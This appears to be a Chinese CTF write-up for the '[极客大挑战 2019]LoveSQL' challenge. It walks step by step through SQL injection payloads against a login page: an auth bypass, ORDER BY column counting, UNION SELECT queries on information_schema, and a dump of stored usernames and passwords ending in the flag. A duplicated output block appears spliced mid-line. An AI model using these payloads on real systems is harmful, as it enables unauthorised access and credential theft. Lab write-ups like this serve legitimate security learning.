极客大挑战_2019 LoveSQL


[极客大挑战 2019]LoveSQL

尝试万能密码登录

Hello admin!Your password is '1eb26772fe42a42d3ef6a247e970d1ee'

payload
check.php?username=admin' or '1'='1&password=2
//登录成功,并没有什么东西

'报错,经排查,没有过滤限制,直接注入

check.php?username=admin' order by 4 %23&password=2
Unknown column '4' in 'order clause'
check.php?username=admin' order by 3 %23&password=2
Login Success!
check.php?username=' union select 1,2,3 %23&password=2
Hello 2!
Your password is '3'//两个回显点
check.php?username=' union select 1,version(),database() %23&password=2
Hello 10.3.18-MariaDB!
Your password is 'geek'
check.php?username=' union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1)%23&password=2
Hello 2!
Your password is 'geekuser'

check.php?username=' union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 1,2)%23&password=2
Hello 2!

Your password is 'l0ve1ysq1'

check.php?username=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())%23&password=2
Hello 2!
Your password is 'geekuser,l0ve1ysq1'//一步到位
check.php?username=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1')%23&password=2
Hello 2!
Your password is 'id,username,password'

check.php?username=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='geekuser')%23&password=2
Hello 2!

Your password is 'id,username,password'
check.php?username=' union select 1,2,(select group_concat(concat_ws(0x7e,username,password)) from l0ve1ysq1)%23&password=2
Hello 2!
Your password is 'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~Hello 2!

Your password is 'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~flag{b68743d7-102c-415c-82f9-447bff55b3f6}''

文章作者: 0xdadream
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 0xdadream !
评论
  目录